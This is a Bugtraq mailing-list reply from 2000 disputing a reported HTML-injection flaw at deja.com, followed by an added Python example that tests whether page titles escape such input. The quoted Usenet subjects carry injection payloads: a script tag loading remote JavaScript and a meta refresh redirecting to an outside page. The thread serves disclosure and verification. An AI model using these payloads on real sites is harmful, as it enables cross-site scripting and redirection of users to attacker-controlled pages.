Bugtraq mailing list archives
Re: Malicious-HTML vulnerabilities at deja.com
From: geert () UTTNARAG TN UTWENTE NL (Geert Altena)
Date: Fri, 17 Mar 2000 12:31:46 +0100
You, Niall Smart, <niall () POBOX COM>, wrote:
> deja.com does not always escape meta-characters when displaying
                ^^^^^^^^^^
> Usenet articles. Specifically, the article view page
> (http://www.deja.com/getdoc.xp) and the thread view page
> (http://www.deja.com/viewthread.xp) display the subject of the
> article "as is" between title tags.
>
> Examples
> ========
>
> JavaScript popup:
>
> http://www.deja.com/getdoc.xp?AN=591804116

Comes out as (copy/paste from netscape):

------------
Forum: alt.test
Thread: </title><script src="http://www.in-design.com/~nsmart/foo.js"></script><body onLoad="return bar()">
Message 1 of 1
Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js"> </script><body onLoad="return bar()">
Date: 03/01/2000
Author: regkey <regkey () yahoo com>
--------------

I have javascript enabled, no popup.

> Redirection using meta tag:
>
> http://www.deja.com/getdoc.xp?AN=591833344

Comes out as:

-----------------
Forum: alt.test
Thread: </title><meta http-equiv="refresh" content="0;url=http://www.in-design.com/~nsmart/deja.html">
Message 1 of 1
Subject: </title><meta http-equiv="refresh" content="0;url=http://www.in-design.com/~nsmart/deja.html">
Date: 03/01/2000
Author: regkey <regkey () yahoo com>
--------------------

No redirection here to www.in-design.com.

Looking at the source, in both cases (javascript and meta refresh) the "<" and ">" are properly replaced by "&lt;" and "&gt;" eliminating the vulnerabilities you mentioned. Same thing applies when I get the article via powersearch.

So either someone at Deja reads Bugtraq and did a fix before this reply or this is a case where things _are_ properly escaped.

Cheers,

\Geert.

--
Geert Altena | Geert () uttnarag tn utwente nl | Coffee, black, no sugar
Finger for PGPkey : Diffie-Hellman 2048/0xC540C550
Prediction is difficult, especially of the future. - (Niels Bohr)
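
The source-level check described in the message above, as an added example that is not part of the original post: a browser shows the same subject text whether or not the page escaped it, so the test has to look at which tags the parser actually sees. The page template and the names `render`, `Outline` and `audit` are assumptions made for illustration, not deja.com's code.

```python
import html
from html.parser import HTMLParser

# Subject lines quoted in the thread above.
SUBJECTS = [
    '</title><script src="http://www.in-design.com/~nsmart/foo.js"></script>'
    '<body onLoad="return bar()">',
    '</title><meta http-equiv="refresh" '
    'content="0;url=http://www.in-design.com/~nsmart/deja.html">',
]

# Tags the constructed template itself emits; anything else came from the subject.
TEMPLATE_TAGS = {"html", "head", "title", "body", "p"}

def render(subject, escape):
    """Constructed stand-in for an article view page (hypothetical template)."""
    shown = html.escape(subject, quote=True) if escape else subject
    return (f"<html><head><title>{shown}</title></head>"
            f"<body><p>Subject: {shown}</p></body></html>")

class Outline(HTMLParser):
    """Records every start tag parsed and the text found inside <title>."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.title, self._in_title = [], "", False

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self._in_title = (tag == "title")

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data

def audit(page_source):
    """Return (title text as displayed, sorted tags not from the template)."""
    parser = Outline()
    parser.feed(page_source)
    parser.close()
    return parser.title, sorted(set(parser.tags) - TEMPLATE_TAGS)

if __name__ == "__main__":
    for subject in SUBJECTS:
        for escape in (False, True):
            title, injected = audit(render(subject, escape))
            print(f"escaped={escape!s:5} injected={injected} title={title[:30]!r}")
```

When the page escapes the subject, the title text reads exactly like the raw subject and no extra tags are parsed; when it does not, the title is empty and a `script` or `meta` element appears in the parse.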